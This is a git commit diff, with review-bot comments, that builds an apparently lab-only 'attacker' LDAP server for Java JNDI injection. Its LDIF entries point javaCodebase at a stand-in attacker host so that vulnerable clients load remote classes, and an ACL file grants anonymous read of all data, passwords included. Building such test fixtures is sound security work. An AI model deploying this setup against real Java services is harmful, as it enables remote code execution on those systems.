
ldap configuration

master
Ivan Ivanov 8 months ago
parent
commit
f2876dc4ab
  1. 4
      attacker/Dockerfile
  2. 16
      attacker/README.md
  3. 4
      attacker/ldap/made-class.ldif
  4. 8
      attacker/ldap/security
  5. 15
      attacker/ldap/serialized-class.ldif
  6. 10
      attacker/serialized-class.ldif

4
attacker/Dockerfile

@ -0,0 +1,4 @@
FROM osixia/openldap:1.5.0
COPY ldap/security /container/service/slapd/assets/config/bootstrap/ldif/02-security.ldif
COPY ldap/*.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/
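Review bot: `FROM osixia/openldap:1.5.0` pins a third-party image by tag only, so a re-pushed tag would change what this fixture is built from; pinning by digest (`FROM osixia/openldap:1.5.0@sha256:<digest-of-the-image-you-tested>`) keeps the build reproducible. The first `COPY` writes to `bootstrap/ldif/02-security.ldif`, which presumably replaces an ACL file shipped in the base image, and nothing on the line says so. A comment above it such as `# Replaces the image's bootstrap ACL with ldap/security, which grants anonymous read` would also explain why `ldap/security` is copied separately from the `ldap/*.ldif` glob.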

16
attacker/README.md

@ -1,5 +1,17 @@
# Attacker
Hosts an ldap with data from *.ldif files
Hosts an ldap with data from ldap/*.ldif files
Hosts an HTTP server serving built classes from files in ./src
Hosts an HTTP server serving built classes from files in ./src
## Usage
Build and run
cd attacker
docker build . -t badldap
docker run -d -p 1389:389 badldap
Test
ldapsearch -x -H ldap://localhost:1389 -b 'dc=example,dc=org'

4
attacker/made-class.ldif → attacker/ldap/made-class.ldif

@ -1,7 +1,7 @@
dn: cn=made-class,dc=ldap-registry,dc=attacker
dn: cn=made-class,dc=example,dc=org
cn: made-class
javaClassName: MadeClass
javaCodebase: http://attacker_codebase:80/
javaCodebase: http://localhost:8088/
javaFactory: FactoryClass
objectClass: top
objectClass: javaContainer

8
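--- a/attacker/ldap/security
+++ b/attacker/ldap/security
@@ -0,0 +1,8 @@
+dn: olcDatabase={1}{{ LDAP_BACKEND }},cn=config
+changetype: modify
+delete: olcAccess
+-
+add: olcAccess
+olcAccess: to * by dn.exact=gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth manage by anonymous read
+olcAccess: to attrs=userPassword,shadowLastChange by self write by dn="cn=admin,{{ LDAP_BASE_DN }}" write by anonymous read
+olcAccess: to * by self read by dn="cn=admin,{{ LDAP_BASE_DN }}" write by anonymous read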
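Review bot: The first `olcAccess` value matches `to *` and ends in `by anonymous read` with no `by * break`, so evaluation stops there for every entry and attribute. Anonymous clients can therefore read everything, including `userPassword`, authenticated non-root binds fall to the implicit `by * none`, and the two rules below it are never reached. If the intent is only that unauthenticated clients can read directory entries, I would end the first rule with `by * break`, end the `userPassword` rule with `by anonymous auth by * none`, and keep `by anonymous read` on the final `to *` rule alone. The file also has no comment saying it deliberately loosens the ACL; LDIF accepts `#` lines, so one line at the top stating that would be enough.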

15
attacker/ldap/serialized-class.ldif

@ -0,0 +1,15 @@
dn: cn=serialized-class,dc=ldap-registry,dc=attacker
cn: serialized-class
javaClassName: SerializedClass
javaClassNames: SerializedClass
javaClassNames: java.lang.Object
javaClassNames: java.io.Serializable
javaCodebase: http://attacker_codebase:80/
javaSerializedData:: rO0ABXNyAA9TZXJpYWxpemVkQ2xhc3MAAAAAAAAAKgIAAUwAB21lc3N
hZ2V0ABJMamF2YS9sYW5nL1N0cmluZzt4cHQAG1NlcmlhbGl6ZWQgT2JqZWN0J3MgTWVzc2FnZQ=
=
objectClass: top
objectClass: javaContainer
objectClass: javaObject
objectClass: javaSerializedObject
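Review bot: The `dn:` in this new file is still under `dc=ldap-registry,dc=attacker` and `javaCodebase` still points at `http://attacker_codebase:80/`, while made-class.ldif in the same commit appears to move to `dc=example,dc=org` and `http://localhost:8088/`. If the container keeps the base DN that the README's test query uses, slapd would likely reject this entry at bootstrap as outside its suffix, so a run against the fixture would cover only one of the two entries without saying so. Either align the DN (`dn: cn=serialized-class,dc=example,dc=org`) or add a `#` comment explaining why the two files differ.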

10
attacker/serialized-class.ldif

@ -1,10 +0,0 @@
dn: cn=made-class,dc=ldap-registry,dc=attacker
cn: made-class
javaClassName: MadeClass
javaCodebase: http://attacker_codebase:80/
javaFactory: FactoryClass
objectClass: top
objectClass: javaContainer
objectClass: javaObject
objectClass: javaNamingReference